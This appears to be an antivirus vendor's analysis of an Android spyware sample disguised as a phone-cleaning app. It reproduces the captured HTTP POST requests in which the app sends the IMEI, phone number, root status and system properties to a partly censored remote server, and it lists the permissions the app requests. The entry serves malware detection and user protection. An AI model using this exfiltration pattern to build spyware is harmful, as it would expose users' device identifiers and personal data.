Android/Odpa.A!tr.spy

Analysis

Android/Odpa.A!tr.spy is a malware which targets Android mobile devices, and sends multiple detailed information to a remote server.

Technical Details

The malware comes packaged as cn.com.opda.android.clearmaster, which is an application to clean up your smartphone (remove cache, history, batch removal of applications etc).
However, at startup, the sample sends multiple information to a remote server via HTTP POST:

POST /app/update HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip,deflate
Charset: utf-8
Content-Type: multipart/form-data; boundary=---------7d4a6d158c9
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)
Host: [CENSORED]kx.net
Content-Length: 873
-----------7d4a6d158c9
Content-Disposition: form-data; name="json"

{"device":{"info":{"model":"sdk","vendor":"unknown",
"product_name":"","secure":1,"bootloader":"unknown",
"kernel":"3.4.0-gd853d22\nnnk@nnk )","board":"",
"tel_number":"15555215554","cid":"","build_product":"generic",
"version":"","baseband":"unknown","model_internal":"",
"description":"sdk-eng 4.4.2 KK 938007 test-keys","sim_operator":"XXXYZ,"
,"product_brand":"generic","product_board":"","build_id":"KK",
"keyboards_devname":"","sdk":"19","device_width":768,"device_height":1184,
"product_device":"generic","release":"4.4.
2","identifier":""}},"wifimac":"","configversion":1000,
"locale":"en","imei":"000000000000000"}

In another post, it posts the content of numerous system properties to the remote server:

POST /device/model_miss HTTP/1.1
...
{"device":{"prop":{"ro.product.manufacturer":"unknown"
,"ro.product.brand":"generic","ro.carrier":""
,"ro.product.model":"sdk",

The system properties which are sent are:

• ro.baseband
• ro.board.platform
• ro.bootloader
• ro.build.id
• ro.build.version.sdk
• ro.build.version.release
• ro.build.description
• ro.build.product
• ro.carrier
• ro.chipname
• ro.cid
• ro.hardware
• ro.htc.common.version
• ro.modversion
• ro.model.internal
• ro.product.version
• ro.product.board
• ro.product.device
• ro.product.name
• ro.product.manufacturer
• ro.product.brand
• ro.product.model
• ro.serialno
• ro.semc.product.name
• gsm.sim.operator.numeric.2
• hw.keyboards.0.devname

The most sensitive information the malware posts are:

• phone number
• IMEI
• MAC address
• indication whether the device is rooted or not ("secure")
• carrier name

The malware contains the following files:

• ./META-INF/CERT.RSA
• ./META-INF/MANIFEST.MF
• ./META-INF/CERT.SF
• ./AndroidManifest.xml
• ./resources.arsc
• ./classes.dex
• several resources
• ./assets/filepath.db: a database of application package names with their paths
• ./assets/RemoteTools.jar

It uses external SDKs, such as:

• Google Ads
• Android Support v4
• Umeng

Those SDKs are not malicious, but may be undesirable for various reasons such as privacy leaks, network traffic etc.
The malware asks for the following permissions:

• READ_CONTACTS
• ACCESS_WIFI_STATE
• READ_LOGS
• INTERNET
• VIBRATE: this is used to trigger cleaning the smartphone.
• READ_HISTORY_BOOKMARKS

This malware was found on an alternative market place.

Recommended Action

• Make sure that your FortiGate/FortiClient system is using the latest AV database.
• Quarantine/delete files that are detected and replace infected files with clean backup copies.